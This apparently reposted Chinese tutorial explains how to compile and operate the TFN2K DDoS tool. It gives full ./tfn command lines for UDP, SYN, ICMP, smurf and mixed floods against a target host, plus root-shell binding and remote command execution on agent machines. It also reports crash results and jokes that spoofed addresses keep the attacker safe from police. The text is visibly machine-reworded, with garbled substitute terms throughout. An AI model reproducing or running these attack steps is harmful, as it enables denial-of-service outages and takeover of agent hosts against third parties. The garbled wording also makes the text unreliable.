Linux对Windows举行DDOS冲击设施

  滥觞：网海拾贝  

---

　　首先说我们用来冲击的客户机和供职器的设置配备部署设施，使用当下最著名的REDHAT LINUX举行测试，本次冲击测试我使用的是FEDORA CORE3 ，软件用的是最著名的DDOS。

　　废话不说了,最先设置供职器。

　　解压 tar -zxvf tfn2k.tgz

　　一.安置TFN2K

　　TFN2K为开放原代码的软件，所以必要我们举行编译，这个不消说了，编译应该都会的吧，但有几个处所是必需细心的，由于使用不同版本和厂商的LINUX必要不同的设置。

　　先修正src/ip.h

　　正文失以下部门，否则编译犯错。 /*struct in_addr

　　　{

　　 unsigned long int s_addr;

　　};*/

　　

　　然后make举行编译

　　编译时会提示你输入供职器端举行密码设置8-32位，(冲击的时分必要输入密码)编译后会出现两个新的实行文件td 和 tfn,个中td是捍卫进程，也是客户机的使用进程。而tfn是供职器节制进程，如果想冲击别人就必需先起动td这个进程，然后再运转供职器进程，否则攻 击有用,变动密码可以实行mkpass举行变动。末端在扫数的客户机中安置并运转td(必要ROOT权限)，并且在供职器上竖立一个文本文件，文件中记录 扫数的客户机IP地址(用VI编纂一个就可行了)，格局为:

　　192.168.0.1

　　192.168.0.2

　　192.168.0.3

　　IP

　　IP

　　……

　　然后在主供职器上运转./tfn

　　二.冲击

　　./tfn直接回车年夜家可以看到一些参数,英文好的冤家估计不消我来多讲了:)

　　格局./tfn <参数>

　　无用的参数我们不提,我们来说冲击用的

　　-f 这个参数前面跟刚才所写的文本文件名,就是真正完成DDOS冲击,而不是DOS

　　-h DOS冲击,也就是单机,一对一的冲击 前面跟一个主机或IP地址

　　-p 前面指定一个端口,不消说了

　　-c 最枢纽的参数,一共有11个选相

　　0 - 停止冲击,发善心用的

　　1 - 反诈骗等级设定 ,由于TFN这个工具在冲击的时分所发出的数据包是带有源地址的,可是源地址是随机的,也就是说地址不是你自给的,所以不消担忧警察抓,哈哈

　　2 - 改编数据包的包尺寸：缺省的ICMP/8,smurf,udp冲击缺省使用最小包。你可以议决窜改每个包的有用载荷的字节添加它的年夜小。

　　3　-　绑定root shell:启动一个会话供职，然后你衔接一个指定端口就可以失失一个root shell。

　　4　-　UDP洪水冲击：这个冲击是使用这样一个幻想：每个udp包被送往一个关闭的端口，这样就会有一个ICMP不行抵达的信息前往，添加了冲击的才干。

　　5　-　SYN洪水冲击：这个冲击有纪律的送虚伪的衔接央求。效果会是目标端口拒绝供职，添瞒TCP衔接表，议决对不存在主机的TCP/RST相应添加冲击潜力,是类型的拒绝供职冲击.

　　6　-　ICMP相应(ping)冲击：这个冲击发送虚伪地址的ping央求，目标主时机回送相通年夜小的相应包。

　　7 - SMURF冲击：用目标主机的地址发送ping央求以播送扩展，这样目标主机将失失回复一个多倍的回复。

　　8　-　MIX冲击：遵照1:1:1的干系交替的发送udp,syn,icmp包，这样就可以关于路由器，另外包转发设备，NIDS,sniffers等,轮番轰炸:)

　　9　- TARGA3冲击

　　10　-　长途命令实行,这个参数是TFN的附加从命,着实TFN的冲击不只仅是DOS,还可以长途的举行明令节制,如:

　　./tfn -f hostext -c 10 -i "mkdir /root/edison" 在扫数的HOST上root家目次竖立edison,-i前面跟"命令"

　　参数根蒂基本说完,下面冲击

　　./tfn -f hostext -c 4 -i www.xxx.com

　　使用hostext文件中记录的主机对163供职器举行UDP冲击(扫数的主机中必需已经起动td进程)

　　./tfn -f hostext -c 5 -i www.xxx.com -p 80

　　使用hostext文件中记录的主机对163供职器举行TCP拒绝供职冲击(80冲击WEB,其他不消说了)

　　./tfn -f hostext -c 6 -i www.xxx.com

　　使用hostext文件中记录的主机对163供职器举行ICMP冲击(PING冲击,缓冲区溢出登时弃世机)

　　./tfn -f hostext -c 8 -i www.xxx.com

　　使用hostext文件中记录的主机对163供职器举行ICMP&TCP&UDP轮番冲击(如果对方是sniffer必定哭弃世)

　　./tfn -f hostext -c 0

　　让所由主机停止冲击

　　根蒂基本说完,末端说说我的测试效果

　　一对一冲击,冲击设施TCP 衔接设施当地 当地CPU13% 被冲击的供职器CPU使用率70%以上,并不时坚定

　　二对一冲击,冲击设施TCP 衔接设施当地 当地单机CPU13% 被冲击的供职器CPU使用率100%

　　五对一冲击,冲击设施TCP 衔接设施当地 当地单机CPU13% 被冲击的供职器弃世机.本身家里只要6台机器,但如果再多点,几十台机器,往常的小我供职器必定要弃世失了

　　一对一冲击,冲击设施ICMP 衔接设施当地 当地CPU18% 被冲击的供职器CPU使用率96%以上,并不时坚定二对一冲击,冲击设施ICMP 衔接设施当地 当地单机CPU18% 被冲击的供职器以经无法上网,简直无法使用,半小时内弃世机.看来威力不小。



版权声明： 原创作品，理会转载，转载时请务必以超链接体式格局标明文章 原始出处 、作者信息和本声明。否则将究查法律责任。